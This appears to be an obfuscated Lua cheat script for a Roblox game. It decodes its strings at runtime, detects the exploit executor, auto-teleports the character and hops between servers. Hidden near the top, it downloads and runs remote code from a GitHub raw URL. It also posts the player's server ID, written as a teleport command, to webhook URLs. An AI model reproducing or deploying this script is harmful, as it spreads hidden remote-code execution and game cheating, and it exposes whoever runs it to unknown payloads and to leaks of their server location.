--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.csm   (Alpha 0.10.3) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v83,v84) local v85={};for v126=1, #v83 do v6(v85,v0(v4(v1(v2(v83,v126,v126 + 1 )),v1(v2(v84,1 + (v126% #v84) ,1 + (v126% #v84) + 1 )))%256 ));end return v5(v85);end loadstring(game:HttpGet("https://raw.githubusercontent.com/Chetdithglon/lklklkl/main/wedhook"))();if game:GetService(v7("\230\204\201\46\245\171\198\29\212","\126\177\163\187\69\134\219\167")).Map:FindFirstChild(v7("\14\212\57\209\245\32\228\57\201\253\45\201","\156\67\173\74\165")) then local v127=(is_sirhurt_closure and v7("\7\190\91\30\169\52\82","\38\84\215\41\118\220\70")) or (pebc_execute and v7("\96\4\45\6\241\99\27\35\1\246\85\4","\158\48\118\66\114")) or (syn and v7("\152\61\30\55\99\182\254\235\28","\155\203\68\112\86\19\197")) or (secure_load and v7("\117\216\56\232\73\118\224\244","\152\38\189\86\156\32\24\133")) or (KRNL_LOADED and v7("\215\69\169\74","\38\156\55\199")) or (SONA_LOADED and v7("\155\114\114\41","\35\200\29\28\72\115\20\154")) or v7("\42\183\216\203\205\41\44\9\179\222\214\153\108\51","\84\121\223\177\191\237\76") ;local v128=game:GetService(v7("\147\66\221\176\9\85\34\215\178\85\204","\161\219\54\169\192\90\48\80"));local v129={[v7("\76\79\2\32\77\81","\69\41\34\96")]={{[v7("\186\202\210\6\6\56","\75\220\163\183\106\98")]={{[v7("\12\187\134\50","\185\98\218\235\87")]="đảo bí ẩn",[v7("\221\61\43\243\219","\202\171\92\71\134\190")]="```Người dùng đã thấy đảo bí ẩn```",[v7("\32\207\32\129\39\196","\232\73\161\76")]=true},{[v7("\181\216\79\88","\126\219\185\34\61")]="lệnh teleport sever",[v7("\26\207\82\103\123","\135\108\174\62\18\30\23\147")]='game:GetService("TeleportService"):TeleportToPlaceInstance('   .. game.PlaceId   .. ', "'   .. game.JobId   .. '", game.Players.LocalPlayer)' ,[v7("\191\231\38\194\22\171","\167\214\137\74\171\120\206\83")]=true}}}}};local v130={[v7("\168\255\60\73\253\169\159\189\6\68\232\162","\199\235\144\82\61\152")]="application/json"};local v131=v128:JSONEncode(v129);Request=http_request or request or HttpPost or syn.request ;local v132={[v7("\50\4\181","\75\103\118\217")]=_G.daobian,[v7("\229\91\116\13","\126\167\52\16\116\217")]=v131,[v7("\229\43\52\136\187\29","\156\168\78\64\224\212\121")]=v7("\55\193\150\250","\174\103\142\197"),[v7("\126\45\94\60\32\76\235","\152\54\72\63\88\69\62")]=v130};Request(v132);end if (game.PlaceId==(7449423635 -0)) then if (game:GetService(v7("\248\205\233\84\192\205\224\91","\60\180\164\142")).Sky.MoonTextureId=="http://www.roblox.com/asset/?id=9709149052") then local v141=0 + 0 ;local v142;local v143;local v144;local v145;local v146;local v147;local v148;while true do if ((3 + 0)==v141) then v148=nil;while true do if (v142==0) then v143=(is_sirhurt_closure and v7("\107\87\23\33\50\255\6","\114\56\62\101\73\71\141")) or (pebc_execute and v7("\136\251\212\208\183\218\214\197\171\225\222\214","\164\216\137\187")) or (syn and v7("\225\255\63\179\182\237\14\146\222","\107\178\134\81\210\198\158")) or (secure_load and v7("\11\11\140\210\163\54\11\142","\202\88\110\226\166")) or (KRNL_LOADED and v7("\232\29\140\251","\170\163\111\226\151")) or (SONA_LOADED and v7("\34\63\188\57","\73\113\80\210\88\46\87")) or v7("\178\36\196\6\167\132\52\221\30\232\136\56\141\21","\135\225\76\173\114") ;v144=game:GetService(v7("\50\249\172\160\159\184\181\12\228\187\181","\199\122\141\216\208\204\221"));v142=827 -(802 + 24) ;end if (v142==(1 -0)) then v145={[v7("\168\208\18\245\124\229","\150\205\189\112\144\24")]={{[v7("\35\141\186\64\0\155","\112\69\228\223\44\100\232\113")]={{[v7("\218\30\10\214","\230\180\127\103\179\214\28")]=v7("\219\80\26\6\201\78\239\130","\128\236\101\63\38\132\33"),[v7("\186\168\29\81\179","\175\204\201\113\36\214\139")]="Người dùng đã thấy Moon 75%",[v7("\78\194\57\213\10\66","\100\39\172\85\188")]=true},{[v7("\163\121\180\133","\83\205\24\217\224")]="lệnh teleport sever",[v7("\240\196\193\40\227","\93\134\165\173")]='game:GetService("TeleportService"):TeleportToPlaceInstance('   .. game.PlaceId   .. ', "'   .. game.JobId   .. '", game.Players.LocalPlayer)' ,[v7("\183\252\205\203\52\203","\30\222\146\161\162\90\174\210")]=true}}}}};v146={[v7("\198\65\126\30\224\64\100\71\209\87\96\15","\106\133\46\16")]="application/json"};v142=2;end if (v142==3) then v148={[v7("\109\50\127","\32\56\64\19\156\58")]=_G.FullMoon,[v7("\120\199\225\79","\224\58\168\133\54\58\146")]=v147,[v7("\116\83\95\245\122\130","\107\57\54\43\157\21\230\231")]=v7("\235\164\34\193","\175\187\235\113\149\217\188"),[v7("\20\170\128\72\230\107\107","\24\92\207\225\44\131\25")]=v146};Request(v148);break;end if (v142==(2 + 0)) then local v239=0 + 0 ;while true do if (v239==(1 + 0)) then v142=8 -5 ;break;end if (v239==(0 -0)) then v147=v144:JSONEncode(v145);Request=http_request or request or HttpPost or syn.request ;v239=1;end end end end break;end if (v141==2) then local v193=0 + 0 ;while true do if ((0 + 0)==v193) then v146=nil;v147=nil;v193=1 + 0 ;end if (v193==1) then v141=3 + 0 ;break;end end end if (v141==1) then v144=nil;v145=nil;v141=2;end if (v141==(0 + 0)) then local v194=1433 -(797 + 636) ;while true do if (v194==(4 -3)) then v141=1620 -(1427 + 192) ;break;end if (v194==(0 + 0)) then v142=0;v143=nil;v194=2 -1 ;end end end end end end local v8=Instance.new(v7("\120\208\170\73\30\115\108\198\177","\29\43\179\216\44\123"));local v9=Instance.new(v7("\137\220\56\88\159\204\52\88\178\215","\44\221\185\64"));local v10=Instance.new(v7("\52\206\107\80\97\15\226\90","\19\97\135\40\63"));local v11=Instance.new(v7("\155\117\20\41\46\53\167\89\61\47","\81\206\60\83\91\79"));local v12=Instance.new(v7("\122\174\200\102\13\214\89\176\65\165","\196\46\203\176\18\79\163\45"));local v13=Instance.new(v7("\141\11\93\17\54\245\234\170","\143\216\66\30\126\68\155"));local v14=Instance.new(v7("\159\225\62\223\215\172\220\228","\129\202\168\109\171\165\195\183"));v8.Parent=game.Players.LocalPlayer:WaitForChild(v7("\18\84\54\193\219\6\193\55\81","\134\66\56\87\184\190\116"));v8.ZIndexBehavior=Enum.ZIndexBehavior.Sibling;v9.Name=v7("\47\52\31\190\11","\85\92\81\105\219\121\139\65");v9.Parent=v8;v9.BackgroundColor3=Color3.fromRGB(255,255,230 + 25 );v9.BorderColor3=Color3.fromRGB(0 + 0 ,0,0);v9.BorderSizePixel=326 -(192 + 134) ;v9.Position=UDim2.new(1276.930088699 -(316 + 960) ,0 + 0 ,0.601923108 + 0 ,0 + 0 );v9.Size=UDim2.new(0.062432725 -0 ,0,551.0596153848 -(83 + 468) ,1806 -(1202 + 604) );v9.Font=Enum.Font.SourceSans;v9.Text="Đổi Sever";v9.TextColor3=Color3.fromRGB(0 -0 ,0 -0 ,0);v9.TextScaled=true;v9.TextSize=38 -24 ;v9.TextWrapped=true;v10.CornerRadius=UDim.new(325 -(45 + 280) ,20 + 0 );v10.Parent=v9;v11.Color=ColorSequence.new({ColorSequenceKeypoint.new(0 + 0 ,Color3.fromRGB(41 + 33 ,255,36 + 165 )),ColorSequenceKeypoint.new(0.29 -0 ,Color3.fromRGB(119,2161 -(340 + 1571) ,51 + 76 )),ColorSequenceKeypoint.new(0.55,Color3.fromRGB(596 -379 ,1280 -(125 + 909) ,2098 -(1096 + 852) )),ColorSequenceKeypoint.new(0.77 + 0 ,Color3.fromRGB(345 -103 ,195 + 6 ,642 -(409 + 103) )),ColorSequenceKeypoint.new(237 -(46 + 190) ,Color3.fromRGB(255,248 -(51 + 44) ,44 + 109 ))});v11.Parent=v9;v12.Parent=v9;v12.BackgroundColor3=Color3.fromRGB(1572 -(1114 + 203) ,255,981 -(228 + 498) );v12.BackgroundTransparency=1;v12.BorderColor3=Color3.fromRGB(0 + 0 ,0,0 + 0 );v12.BorderSizePixel=663 -(174 + 489) ;v12.Position=UDim2.new( -0.103447914,0 -0 , -(1906.54838681 -(830 + 1075)),524 -(303 + 221) );v12.Size=UDim2.new(1.18965518,1269 -(231 + 1038) ,1.54838705 + 0 ,1162 -(171 + 991) );v12.ZIndex= -1;v12.Font=Enum.Font.SourceSansBold;v12.Text="x";v12.TextColor3=Color3.fromRGB(1050 -795 ,0,0);v12.TextScaled=true;v12.TextSize=14;v12.TextStrokeColor3=Color3.fromRGB(684 -429 ,59 -35 ,6 + 1 );v12.TextWrapped=true;v13.CornerRadius=UDim.new(0,70 -50 );v13.Parent=v12;v14.Thickness=8.900000095367432 -5 ;v14.Parent=v12;local function v56() local v86=Instance.new(v7("\206\176\66\76\108\203","\191\157\211\48\37\28"),v11);local v87=game:GetService(v7("\235\8\241\25\52\236\26\230\10\51\220\26","\90\191\127\148\124"));local v88=TweenInfo.new(4,Enum.EasingStyle.Linear,Enum.EasingDirection.In, -(1 -0));local v89=v87:Create(v86.Parent,v88,{[v7("\74\136\58\22\108\142\33\25","\119\24\231\78")]=1112 -752 });v89:Play();end coroutine.wrap(v56)();local function v57() local v90=1248 -(111 + 1137) ;local v91;while true do if ((158 -(91 + 67))==v90) then v91=Instance.new(v7("\177\46\183\67\204\84","\113\226\77\197\42\188\32"),v12);v91.Parent.MouseButton1Click:Connect(function() v91.Parent.Parent:Destroy();end);break;end end end coroutine.wrap(v57)();local function v58() local v92=0 -0 ;local v93;local v94;while true do if (v92==0) then v93=0 + 0 ;v94=nil;v92=1;end if (v92==1) then while true do if (v93==(523 -(423 + 100))) then v94=Instance.new(v7("\22\25\247\180\54\37\247\167\51\6\224","\213\90\118\148"),v9);v94.Parent.MouseButton1Click:Connect(function() game:GetService(v7("\111\43\184\83\93\84\60\160\101\72\73\56\189\85\72","\45\59\78\212\54")):Teleport(game.PlaceId,game:GetService(v7("\32\90\130\146\131\60\190","\144\112\54\227\235\230\78\205")).LocalPlayer);end);break;end end break;end end end coroutine.wrap(v58)();local v59={};local v60=game:GetService(v7("\135\63\10\249\222\104\182\58\25\245\211\94","\59\211\72\111\156\176"));local v61=Instance.new(v7("\125\132\241\40\75\137\196\56\71","\77\46\231\131"));v61.Name=v7("\152\85\186\65\168\85\188\65","\32\218\52\214");v61.Parent=game.CoreGui;v61.ZIndexBehavior=Enum.ZIndexBehavior.Sibling;local v66=Instance.new(v7("\104\5\48\165\244","\58\46\119\81\200\145\208\37"));v66.Name=v7("\5\131\36\165\143\175\55\38\137","\86\75\236\80\204\201\221");v66.Parent=v61;v66.AnchorPoint=Vector2.new(0.5 + 0 ,0.5 -0 );v66.BackgroundColor3=Color3.fromRGB(133 + 122 ,255,255);v66.BackgroundTransparency=772 -(326 + 445) ;v66.Position=UDim2.new(1.2,0,0.0613496937 -0 ,0 -0 );v66.Size=UDim2.new(0 -0 ,1632,0,811 -(530 + 181) );local v74=Instance.new(v7("\71\104\91\140\237\159\94\64\110\138\235\159","\235\18\33\23\229\158"));v74.Name=v7("\126\181\213\178\92\179\210\175\92\187\216\180\69\174","\219\48\218\161");v74.Parent=v66;v74.FillDirection=Enum.FillDirection.Vertical;v74.SortOrder=Enum.SortOrder.LayoutOrder;v74.Padding=UDim.new(881 -(614 + 267) ,37 -(19 + 13) );v59.Notification=function(v95,v96,v97,v98,v99) local v100=0 -0 ;local v101;local v102;local v103;local v104;local v105;local v106;local v107;local v108;local v109;local v110;while true do if (v100==(16 -9)) then local v149=0 -0 ;while true do if (v149==0) then v107=Instance.new(v7("\131\224\97\225\197\202\181\224\117","\171\215\133\25\149\137"));v107.Name=v7("\213\205\42\238\193\63\232\75","\34\129\168\82\154\143\80\156");v149=1;end if (v149==(1 + 0)) then v107.Parent=v106;v107.Active=true;v149=2;end if (v149==(3 -1)) then v107.BackgroundColor3=Color3.fromRGB(528 -273 ,2067 -(1293 + 519) ,520 -265 );v107.BackgroundTransparency=1;v149=7 -4 ;end if (v149==(5 -2)) then v107.Size=UDim2.new(0 -0 ,412 -237 ,0,14 + 11 );v100=2 + 6 ;break;end end end if ((6 -3)==v100) then v104.Name=v7("\137\170\198\252\82\241\143\179\206","\159\224\199\167\155\55");v104.Parent=v101;v104.AnchorPoint=Vector2.new(0.5 + 0 ,0.5 + 0 );v104.BackgroundColor3=Color3.fromRGB(160 + 95 ,255,255);v104.Position=UDim2.new(0.135999978,1096 -(709 + 387) ,1858.5 -(673 + 1185) ,0);v104.Size=UDim2.new(0 -0 ,160 -110 ,0 -0 ,36 + 14 );v104.BackgroundTransparency=1 + 0 ;v100=4;end if (v100==(6 -1)) then local v157=0;while true do if ((1 + 2)==v157) then v105.TextXAlignment=Enum.TextXAlignment.Left;v100=11 -5 ;break;end if (v157==(0 -0)) then v105.Position=UDim2.new(0.25,1880 -(446 + 1434) ,0.15,0);v105.Size=UDim2.new(1283 -(1040 + 243) ,522 -347 ,1847 -(559 + 1288) ,1955 -(609 + 1322) );v157=1;end if (v157==2) then local v205=0;while true do if (v205==(455 -(13 + 441))) then v157=3;break;end if (v205==(0 -0)) then v105.TextSize=33 -20 ;v105.Text=v96;v205=4 -3 ;end end end if (v157==1) then v105.Font=Enum.Font.LuckiestGuy;v105.TextColor3=Color3.fromRGB(4 + 81 ,617 -447 ,91 + 164 );v157=1 + 1 ;end end end if (v100==(17 -11)) then local v158=0;while true do if ((1 + 0)==v158) then local v209=0 -0 ;while true do if (v209==0) then v106.AnchorPoint=Vector2.new(0.5,0.5 + 0 );v106.BackgroundColor3=Color3.fromRGB(142 + 113 ,184 + 71 ,215 + 40 );v209=1;end if (v209==(1 + 0)) then v158=435 -(153 + 280) ;break;end end end if (v158==(5 -3)) then v106.BackgroundTransparency=1 + 0 ;v106.Position=UDim2.new(0.625999987 + 0 ,0 + 0 ,0.620000005 + 0 ,0 + 0 );v158=4 -1 ;end if (v158==(2 + 1)) then v106.Size=UDim2.new(667 -(89 + 578) ,126 + 49 ,0 -0 ,1074 -(572 + 477) );v100=1 + 6 ;break;end if (v158==(0 + 0)) then v106.Name=v7("\9\208\88\86\182\3\195\91\87\182","\211\69\177\58\58");v106.Parent=v101;v158=1 + 0 ;end end end if ((95 -(84 + 2))==v100) then local v159=0;while true do if (v159==(0 -0)) then v108=Instance.new(v7("\163\160\50\6\77","\233\229\210\83\107\40\46"));v109=Instance.new(v7("\244\107\17\217\23\207\71\32","\101\161\34\82\182"));v159=1;end if (v159==(3 + 0)) then v108.BackgroundColor3=Color3.fromRGB(85,170,1097 -(497 + 345) );v100=1 + 9 ;break;end if (v159==2) then v108.Parent=v101;v108.Active=true;v159=3;end if (v159==1) then v110=Instance.new(v7("\221\36\105\255\223\230\139\32\239","\78\136\109\57\158\187\130\226"));v108.Name=v7("\10\54\244\244","\145\94\95\153");v159=1 + 1 ;end end end if (v100==(1334 -(605 + 728))) then local v160=0 + 0 ;while true do if (v160==(6 -3)) then v102.Color=Color3.fromRGB(255,12 + 243 ,255);v100=2;break;end if (v160==(7 -5)) then v102.ApplyStrokeMode=Enum.ApplyStrokeMode.Border;v102.LineJoinMode=Enum.LineJoinMode.Round;v160=3 + 0 ;end if (1==v160) then v102.Name="";v102.Parent=v101;v160=5 -3 ;end if ((0 + 0)==v160) then v102=Instance.new(v7("\153\7\152\95\213\88\21\12","\105\204\78\203\43\167\55\126"));v102.Thickness=490 -(457 + 32) ;v160=1 + 0 ;end end end if (2==v100) then local v161=1402 -(832 + 570) ;while true do if (v161==0) then v102.Transparency=0 + 0 ;v101:TweenSizeAndPosition(UDim2.new(0 + 0 ,(884 -634) -(5 + 5) ,796 -(588 + 208) ,188 -118 ),UDim2.new(1800.5 -(884 + 916) ,0 -0 ,0.5 + 0 ,653 -(232 + 421) ),v7("\138\191\55","\49\197\202\67\126\115\100\167"),v7("\21\90\220\34","\62\87\59\191\73\224\54"),1889.3 -(1569 + 320) ,true);v161=1 + 0 ;end if (v161==(1 + 0)) then v103=Instance.new(v7("\210\43\217\198\245\12\255\219","\169\135\98\154"));v103.CornerRadius=UDim.new(0 -0 ,4);v161=607 -(316 + 289) ;end if (v161==(5 -3)) then v103.Name=v7("\232\120\42\90\248\33\252\194\99\45\88\248","\168\171\23\68\52\157\83");v103.Parent=v101;v161=1 + 2 ;end if (v161==(1456 -(666 + 787))) then v104=Instance.new(v7("\221\124\244\170\32\1\134\246\116\249","\231\148\17\149\205\69\77"));v100=428 -(360 + 65) ;break;end end end if (v100==(10 + 0)) then v108.BorderSizePixel=254 -(79 + 175) ;v108.Position=UDim2.new(0.0320000015 -0 ,0 + 0 ,0.870000005,0 -0 );v108.Size=UDim2.new(0 -0 ,236,899 -(503 + 396) ,184 -(92 + 89) );v109.Parent=v108;v109.CornerRadius=UDim.new(0,13 -6 );v109.Name="";v110.Parent=v66;v100=6 + 5 ;end if (v100==0) then if (v99==nil) then v99="";end if (v98==nil) then v98=1;end v101=Instance.new(v7("\194\99\125\68\222","\128\132\17\28\41\187\47"));v101.Name=v7("\53\59\18\54\88\39\32\7\55\88","\61\97\82\102\90");v101.Parent=v66;v101.BackgroundColor3=Color3.fromRGB(35,21 + 14 ,137 -102 );v101.Size=UDim2.new(0 + 0 ,0 -0 ,0 + 0 ,0);v100=1 + 0 ;end if (v100==(24 -16)) then local v173=0;while true do if ((1 + 0)==v173) then local v231=0 -0 ;while true do if (v231==(1245 -(485 + 759))) then v173=4 -2 ;break;end if (v231==(1189 -(442 + 747))) then v107.TextScaled=true;v107.TextColor3=Color3.fromRGB(255,1390 -(832 + 303) ,1201 -(88 + 858) );v231=1 + 0 ;end end end if (v173==(0 + 0)) then local v232=0 + 0 ;while true do if (v232==0) then v107.Font=Enum.Font.GothamBlack;v107.Text=v97;v232=790 -(766 + 23) ;end if (v232==(4 -3)) then v173=1 -0 ;break;end end end if ((4 -2)==v173) then v107.TextSize=40 -28 ;v107.TextXAlignment=Enum.TextXAlignment.Left;v173=1076 -(1036 + 37) ;end if (v173==(3 + 0)) then repeat wait();until v101.Size==UDim2.new(0 -0 ,(197 + 53) -(1490 -(641 + 839)) ,913 -(910 + 3) ,70)  v100=22 -13 ;break;end end end if (v100==4) then v104.Image="http://www.roblox.com/asset/?id="   .. tostring(v99) ;v105=Instance.new(v7("\195\246\36\198\219\242\62\215\251","\178\151\147\92"));v106=Instance.new(v7("\170\239\77\63\23","\26\236\157\44\82\114\44"));v105.Name=v7("\62\54\209\87\35\42","\59\74\78\181");v105.Parent=v101;v105.BackgroundColor3=Color3.fromRGB(85,1854 -(1466 + 218) ,255);v105.BackgroundTransparency=1 + 0 ;v100=1153 -(556 + 592) ;end if (v100==11) then v110.PaddingLeft=UDim.new(0 + 0 ,15);v110.PaddingTop=UDim.new(808 -(329 + 479) ,15);v60:Create(v108,TweenInfo.new(tonumber(v98),Enum.EasingStyle.Linear,Enum.EasingDirection.InOut),{[v7("\206\196\14\208","\215\157\173\116\181\46")]=UDim2.new(854 -(174 + 680) ,0 -0 ,0 -0 ,3 + 0 )}):Play();delay(tonumber(v98),function() local v182=0;while true do if (v182==2) then v60:Create(v101,TweenInfo.new(739.4 -(396 + 343) ,Enum.EasingStyle.Quart,Enum.EasingDirection.InOut),{[v7("\2\139\102\185","\220\81\226\28")]=UDim2.new(0,0,0,7 + 63 )}):Play();wait(1477.3 -(29 + 1448) );v182=3;end if (v182==0) then local v237=1389 -(135 + 1254) ;while true do if (v237==(0 -0)) then v60:Create(v104,TweenInfo.new(0.2 -0 ,Enum.EasingStyle.Sine,Enum.EasingDirection.InOut),{[v7("\28\185\138\245\223\1\166\138\252\201\37\181\153\247\212\54\173","\186\85\212\235\146")]=1}):Play();v60:Create(v107,TweenInfo.new(0.2,Enum.EasingStyle.Sine,Enum.EasingDirection.InOut),{[v7("\246\132\14\234\13\252\89\204\146\6\255\43\235\86\193\152","\56\162\225\118\158\89\142")]=1 + 0 }):Play();v237=1;end if (1==v237) then v182=1528 -(389 + 1138) ;break;end end end if ((577 -(102 + 472))==v182) then v101:Destroy();break;end if (v182==(1 + 0)) then v60:Create(v105,TweenInfo.new(0.2,Enum.EasingStyle.Sine,Enum.EasingDirection.InOut),{[v7("\104\0\216\187\22\202\93\11\211\191\35\202\89\11\195\182","\184\60\101\160\207\66")]=1 + 0 }):Play();wait(0.3);v182=2;end end end);break;end end end;repeat wait();until game:IsLoaded() aut=true;function totarget(v111) local v112=game:service(v7("\39\194\135\254\228\244\22\199\148\242\233\194","\167\115\181\226\155\138"));local v113=TweenInfo.new((game:GetService(v7("\210\46\230\69\126\99\213","\166\130\66\135\60\27\17"))[v7("\104\69\205\116\60\116\70\207\108\53\86","\80\36\42\174\21")].Character.HumanoidRootPart.Position-v111.Position).Magnitude/300 ,Enum.EasingStyle.Linear);local v114,v115=pcall(function() tween=v112:Create(game.Players.LocalPlayer.Character['HumanoidRootPart'],v113,{[v7("\109\54\37\123\67\21","\26\46\112\87")]=v111});tween:Play();end);if  not v114 then return v115;end end function thisCode() repeat task.wait();until game:IsLoaded() local v116=game.PlaceId;local v117={};local v118="";local v119=os.date(v7("\248\105\191","\212\217\67\203\20\223\223\37")).hour;local v120=false;local v121=pcall(function() v117=game:GetService(v7("\146\153\188\194\137\136\186\196\179\142\173","\178\218\237\200")):JSONDecode(readfile(v7("\152\186\242\227\183\184\227\227\179\167\240\213\164\166\168\218\165\186\232","\176\214\213\134")));end);if  not v121 then local v139=0 + 0 ;local v140;while true do if ((1545 -(320 + 1225))==v139) then v140=0 -0 ;while true do if (v140==(0 + 0)) then table.insert(v117,v119);writefile(v7("\218\162\162\231\169\91\92\199\168\164\194\173\68\74\186\167\165\219\166","\57\148\205\214\180\200\54"),game:GetService(v7("\58\233\33\36\69\23\239\35\61\117\23","\22\114\157\85\84")):JSONEncode(v117));break;end end break;end end end function TPReturner() local v133=0;local v134;local v135;local v136;while true do if (v133==(1466 -(157 + 1307))) then v136=1859 -(821 + 1038) ;for v186,v187 in pairs(v134.data) do local v188=0 -0 ;local v189;local v190;local v191;while true do if (v188==(0 + 0)) then v189=0 -0 ;v190=nil;v188=1 + 0 ;end if (v188==(2 -1)) then v191=nil;while true do if (v189==(1027 -(834 + 192))) then while true do if (v190==(0 + 0)) then local v268=0 + 0 ;while true do if (v268==(0 + 0)) then v191=true;v135=tostring(v187.id);v268=1 -0 ;end if (v268==(305 -(300 + 4))) then v190=1;break;end end end if (v190==(1 + 0)) then if (tonumber(v187.maxPlayers)>tonumber(v187.playing)) then local v269=0 -0 ;while true do if (v269==(362 -(112 + 250))) then for v270,v271 in pairs(v117) do local v272=0 + 0 ;local v273;while true do if (v272==(0 -0)) then v273=0;while true do if (v273==0) then if (v136~=0) then if (v135==tostring(v271)) then v191=false;end elseif (tonumber(v119)~=tonumber(v271)) then local v275=pcall(function() local v276=0;while true do if (v276==(0 + 0)) then delfile(v7("\144\251\23\118\130\179\241\48\64\145\168\241\17\86\205\180\231\12\75","\227\222\148\99\37"));v117={};v276=1;end if (v276==(1 + 0)) then table.insert(v117,v119);break;end end end);end v136=v136 + 1 + 0 ;break;end end break;end end end if (v191==true) then local v274=0;while true do if (0==v274) then table.insert(v117,v135);wait();v274=1 + 0 ;end if (v274==(1 + 0)) then pcall(function() writefile(v7("\29\93\70\197\248\62\87\97\243\235\37\87\64\229\183\57\65\93\248","\153\83\50\50\150"),game:GetService(v7("\117\98\103\12\64\174\95\75\127\112\25","\45\61\22\19\124\19\203")):JSONEncode(v117));wait();game:GetService(v7("\245\23\1\240\18\127\171\213\33\8\231\20\121\186\196","\217\161\114\109\149\98\16")):TeleportToPlaceInstance(v116,v135,game.Players.LocalPlayer);end);wait(1418 -(1001 + 413) );break;end end end break;end end end break;end end break;end if (v189==(0 -0)) then v190=882 -(244 + 638) ;v191=nil;v189=1;end end break;end end end break;end if ((694 -(627 + 66))==v133) then v135="";if (v134.nextPageCursor and (v134.nextPageCursor~=v7("\202\222\31\200","\200\164\171\115\164\61\150")) and (v134.nextPageCursor~=nil)) then v118=v134.nextPageCursor;end v133=5 -3 ;end if (v133==(602 -(512 + 90))) then v134=nil;if (v118=="") then v134=game.HttpService:JSONDecode(game:HttpGet("https://games.roblox.com/v1/games/"   .. v116   .. "/servers/Public?sortOrder=Asc&limit=100" ));else v134=game.HttpService:JSONDecode(game:HttpGet("https://games.roblox.com/v1/games/"   .. v116   .. "/servers/Public?sortOrder=Asc&limit=100&cursor="   .. v118 ));end v133=1907 -(1665 + 241) ;end end end function Teleport() while wait() do pcall(function() local v181=717 -(373 + 344) ;while true do if (v181==0) then TPReturner();if (v118~="") then TPReturner();end break;end end end);end end local v122=0.5 + 0 ;task.spawn(function() while task.wait(v122) do pcall(function() for v183,v184 in pairs(game.CoreGui:GetDescendants()) do pcall(function() if string.find(v184.Name,v7("\55\50\42\115\174\89\23\51\43\125\187\113","\20\114\64\88\28\220")) then if string.find(v184.Text,v7("\2\4\209\161\234\217\169\40\65\217\189\251\219","\221\81\97\178\212\152\176")) then local v249=0;local v250;while true do if (v249==0) then v250=0;while true do if (v250==(0 + 0)) then v122=2637724656 -1637724656 ;Teleport();break;end end break;end end end end end);end end);end end);local v123=game:GetService(v7("\254\243\28\233\14\200\245\58\238\19","\122\173\135\125\155"));local v124=Instance.new(v7("\166\200\14\189\62\51\196\129\231\21\183\60\37\193\139\207","\168\228\161\96\217\95\81"));function gui() v123:SetCore(v7("\232\212\32\88\1\88\207\216\40\85\44\86\207\216\33\82","\55\187\177\78\60\79"),{[v7("\25\199\75\231\67","\224\77\174\63\139\38\175")]=v7("\165\84\76\33\196\103\74\47\137\1\123\38\129\82\76","\78\228\33\56"),[v7("\250\119\166\15\128","\229\174\30\210\99")]=v7("\57\244\198\83\228\51\49\26\238\141\84\255\49\54","\89\123\141\230\49\141\93"),[v7("\199\116\238\24","\42\147\17\150\108\112")]=v7("\59\163\33\122\170\203\7\163\62\107\167\206\6\190","\136\111\198\77\31\135"),[v7("\54\12\191\66","\201\98\105\199\54\221\132\119")]=v7("\159\5\155\36\6\117\171\184\1\134\97\7\39\190\182\30\144\97\1\58\168\188\76\209\119\85","\204\217\108\227\65\98\85"),[v7("\119\192\250\235","\160\62\163\149\133\76")]="rbxassetid://16435032782",[v7("\242\181\31\46\215\223\175\3","\163\182\192\109\79")]=math.huge,[v7("\23\39\12\204\247\53\37\11","\149\84\70\96\160")]=v124,[v7("\26\19\25\249\55\8\92","\141\88\102\109")]=v7("\239\126\203\126\27\125\77\129\158\82\201\98\21\5\11","\161\211\51\170\16\122\93\53")});end gui();v124.OnInvoke=function(v137) if (v137==v7("\214\175\188\41","\72\155\206\210")) then aut=false;gui();elseif (v137==v7("\107\123\87\28\60\6\98","\83\38\26\52\110")) then local v192=0 -0 ;while true do if (v192==0) then aut=true;gui();v192=1100 -(35 + 1064) ;end if ((1 + 0)==v192) then auto();break;end end end end;function auto() if (aut==true) then task.spawn(function() while aut==true  do if (aut==true) then local v238=game.Players.LocalPlayer:FindFirstChild(v7("\123\31\38\84\89\20\51\67\74","\38\56\119\71"));if  not game.Players.LocalPlayer.Character then else local v251=game.Players.LocalPlayer.Character:FindFirstChild(v7("\208\253\93\193\7\116\212","\54\147\143\56\182\69"),true);if v251 then v251:Destroy();end local v252=game.Players.LocalPlayer.Character:FindFirstChild(v7("\254\148\242\72\209\217\136\251","\191\182\225\159\41"));if v252 then local v257=game.Workspace:FindFirstChild(v7("\8\26\45\70\159\211","\162\75\114\72\53\235\231")) or game.Workspace:FindFirstChild(v7("\175\52\65\241\71\81","\98\236\92\36\130\51")) or game.Workspace:FindFirstChild(v7("\135\17\9\169\81\250","\80\196\121\108\218\37\200\213")) ;if v257 then local v266=0 -0 ;local v267;while true do if (v266==0) then v267=0 + 0 ;while true do if (v267==(1236 -(298 + 938))) then game.Players.LocalPlayer.Character:PivotTo(v257:GetPivot());firesignal(v257.Touched,game.Players.LocalPlayer.Character.HumanoidRootPart);break;end end break;end end elseif (game.Players.LocalPlayer.Backpack:FindFirstChild(v7("\92\85\11\109\88\26\202\15\117\66\123\74\28\129\14\118\17\108\21","\234\96\19\98\31\43\110")) or game.Players.LocalPlayer.Character:FindFirstChild(v7("\90\57\91\213\191\102\203\9\25\18\195\173\96\128\8\26\65\212\242","\235\102\127\50\167\204\18")) or game.Players.LocalPlayer.Backpack:FindFirstChild("<God's Chalice>") or game.Players.LocalPlayer.Character:FindFirstChild("<God's Chalice>")) then aut=false;Teleport();break;end end end end task.wait();end end);end end end thisCode();auto();task.spawn(function() while wait() do if (game.Players.LocalPlayer.Backpack:FindFirstChild(v7("\12\135\252\48\80\110\95\167\181\7\69\60\91\175\240\48\87\112","\78\48\193\149\67\36")) or game.Players.LocalPlayer.Character:FindFirstChild(v7("\108\56\137\11\85\112\17\134\88\101\49\12\139\22\68\35\13\222","\33\80\126\224\120"))) then aut=false;end end end);join=game.Players.localPlayer.Neutral==false ;if (_G.Team==nil) then _G.Team=v7("\176\152\10\214\93\248\173\16\154","\60\140\200\99\164");end 